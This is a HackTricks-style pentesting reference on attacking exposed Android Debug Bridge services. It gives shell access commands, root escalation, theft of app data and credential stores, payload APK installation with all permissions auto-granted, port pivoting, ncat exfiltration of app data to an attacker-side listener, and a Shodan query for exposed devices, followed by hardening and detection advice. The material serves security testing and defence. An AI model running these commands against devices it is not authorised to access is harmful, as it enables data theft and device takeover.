# 5555 - Android Debug Bridge {{#include ../banners/hacktricks-training.md}} ## Basic Information From [the docs](https://developer.android.com/studio/command-line/adb): Android Debug Bridge (adb) is a command-line tool to communicate with Android-based devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device. - Historical default TCP port: 5555 (classic "adb tcpip" mode). - Modern Wireless debugging (Android 11+) uses TLS pairing and mDNS service discovery. The connect port is dynamic and discovered via mDNS; it may not be 5555. Pairing is done with adb pair host:port followed by adb connect. See the notes below for offensive implications. Example nmap fingerprint: ``` PORT STATE SERVICE VERSION 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) ``` ## Connect If you find ADB exposed and reachable, try connecting and enumerating quickly: ```bash adb connect [:] # Default is 5555 for classic mode adb devices -l # Confirm it shows as "device" (not unauthorized/offline) adb shell # Get an interactive shell (uid usually shell) whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port adb root || true # Works on eng/userdebug/insecure builds, many emulators/IoT ``` - If the device enforces ADB authentication (ro.adb.secure=1), you’ll need to be pre-authorized (USB RSA auth) or use Android 11+ Wireless debugging pairing (which requires a one-time code displayed on the device). - Some vendor images, engineering/userdebug builds, emulators, TVs, STBs and development kits expose adbd without auth or with adbd running as root. In those cases, you’ll typically land directly in a shell or root shell. For a general ADB command reference, see: {{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}} ## Quick Post-Exploitation Once you have shell, validate privileges and SELinux context: ```bash id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint ``` ### Enumerate and capture data - List third-party apps and paths: ```bash pm list packages -3 pm path ``` - If you have root (adb root or su works), you can access /data directly. If not, prefer run-as for debuggable apps: ```bash # Without root, for a debuggable app run-as sh -c 'cd /data/data/ && tar cf - .' | tar xf - -C ./loot/ # With root cp -a /data/data/ /sdcard/ exit adb pull "/sdcard/" ``` - Useful system artifacts (root required): - /data/system/users/0/accounts.db and related AccountManager data - /data/misc/wifi/ (network configs/keys on older versions) - App-specific SQLite DBs and shared_prefs under /data/data/ You can use this to retrieve sensitive info (e.g., app secrets). For notes about Chrome data considerations, see the issue referenced [here](https://github.com/carlospolop/hacktricks/issues/274). ### Code execution and payload delivery - Install and auto-grant runtime permissions: ```bash adb install -r -g payload.apk # -g grants all runtime perms declared in manifest adb shell monkey -p -c android.intent.category.LAUNCHER 1 ``` - Start activities/services/broadcasts directly: ```bash adb shell am start -n / adb shell am startservice -n / adb shell am broadcast -a ``` ### Port forwarding and pivoting Even without root, adb can forward local ports to device ports and vice versa. This is useful to access services bound locally on the device or to expose attacker services to the device. - Forward host->device (access a device-local service from your host): ```bash adb forward tcp:2222 tcp:22 # If device runs SSH (e.g., Termux/Dropbear) adb forward tcp:8081 tcp:8080 # Expose app’s local debug server ``` - Reverse device->host (let the device reach a service on your host): ```bash adb reverse tcp:1080 tcp:1080 # Device apps can now reach host:1080 as 127.0.0.1:1080 ``` - File exfiltration over sockets (no sdcard writes): ```bash # On host: listen ncat -lvp 9000 > dump.tar # On device: send directory as tar (root or run-as as applicable) adb shell "tar cf - /data/data/" | ncat 9000 ``` ## Wireless Debugging (Android 11+) Modern Android implements TLS-protected wireless debugging with device-side pairing and mDNS discovery: ```bash # On the device: Developer options -> Wireless debugging -> Pair device with pairing code # On attacker host (same L2 network, mDNS allowed): adb pair : # Enter the 6-digit code shown on device adb mdns services # Discover _adb-tls-connect._tcp / _adb._tcp services adb connect : ``` Notes - Ports are dynamic; don’t assume 5555. mDNS service names look like: - _adb-tls-pairing._tcp (pairing) - _adb-tls-connect._tcp (paired connect) - _adb._tcp (legacy/plain) - If mDNS is filtered, classic USB-assisted enabling may still work on some builds: `adb tcpip 5555` then `adb connect :5555` (until reboot). Offensive implications: if you can interact with the device UI (e.g., physical access or mobile MDM misconfig) to enable Wireless debugging and view the pairing code, you can establish a long-lived paired ADB channel without a cable. Some OEMs expose ADB over TCP in engineering/dev images without pairing—always check. ## Hardening / Detection Defenders should assume any reachable adbd (TCP) is critical risk. - Disable ADB and Wireless debugging when not needed. Revoke USB debugging authorizations in Developer options. - Ensure network policy blocks inbound TCP/5555 and mDNS-based ADB discovery on untrusted segments. - On devices under your control: ```bash settings put global adb_enabled 0 setprop service.adb.tcp.port -1 # disable TCP listening (or use: adb usb) stop adbd; start adbd # restart daemon ``` - Monitor for mDNS records `_adb._tcp`, `_adb-tls-connect._tcp`, `_adb-tls-pairing._tcp` on corporate networks and alerts for unexpected 5555 listeners. - Inventory for insecure builds: `getprop ro.debuggable`, `ro.build.type`, and `ro.adb.secure`. ## Shodan - android debug bridge - port:5555 product:"Android Debug Bridge" ## References - Android Developers – Android Debug Bridge (adb): https://developer.android.com/studio/command-line/adb - AOSP – ADB over Wi‑Fi, pairing and mDNS service names: https://android.googlesource.com/platform/packages/modules/adb/+/refs/tags/android-vts-15.0_r2/docs/dev/adb_wifi.md {{#include ../banners/hacktricks-training.md}}